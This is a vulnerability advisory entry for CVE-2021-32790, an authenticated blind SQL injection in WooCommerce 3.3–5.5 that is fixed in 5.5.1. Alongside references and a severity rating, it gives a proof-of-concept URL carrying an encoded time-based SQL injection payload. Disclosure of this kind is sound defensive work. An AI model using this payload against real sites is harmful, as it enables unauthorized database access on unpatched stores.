WordPress Plugin Vulnerabilities

Woocommerce 3.3 to 5.5 - Authenticated Blind SQL Injection

Description

The plugin was reported to be affected by a critical Authenticated Blind SQL Injection vulnerability.

Proof of Concept

http://www.example.com/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][taxonomy]=a%252522%252529%252520or%252520sleep%25252810.1%252529%252523

Affects Plugins

Plugin icon
woocommerce
Fixed in 5.5.1

References

CVE
CVE-2021-32790
URL
https://github.com/woocommerce/woocommerce/security/advisories/GHSA-7vx5-x39w-q24g
URL
https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/
URL
https://twitter.com/WooCommerce/status/1415442447312764931
URL
https://www.wordfence.com/blog/2021/07/critical-sql-injection-vulnerability-patched-in-woocommerce/
URL
https://noc.org/2021/07/15/serious-sqli-in-woocommerce/
URL
https://blog.wpscan.com/critical-woocommerce-vulnerabilities/

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
7.2 (high)

Miscellaneous

Original Researcher
Josh (jl-dos)
Verified
No
WPVDB ID
1212fec8-1fde-41e5-af70-abdd7ffe5379

Timeline

Publicly Published
2021-07-15 (about 2 years ago)
Added
2021-07-15 (about 2 years ago)
Last Updated
2023-01-23 (about 10 months ago)

Other

Published
Title
Published
2017-05-02
Title
Calendar by WD < 1.5.52 - Admin+ SQL injection
Published
2021-08-22
Title
MicroCopy <= 1.1.0 - Authenticated SQL Injection
Published
2014-08-01
Title
GRAND Flash Album Gallery 0.55 - lib/hitcounter.php pid Parameter SQL Injection
Published
2021-05-27
Title
Xllentech English Islamic Calendar < 2.6.8 - Authenticated SQL Injection
Published
2018-11-08
Title
RSVPMaker < 5.6.4 - SQL Injection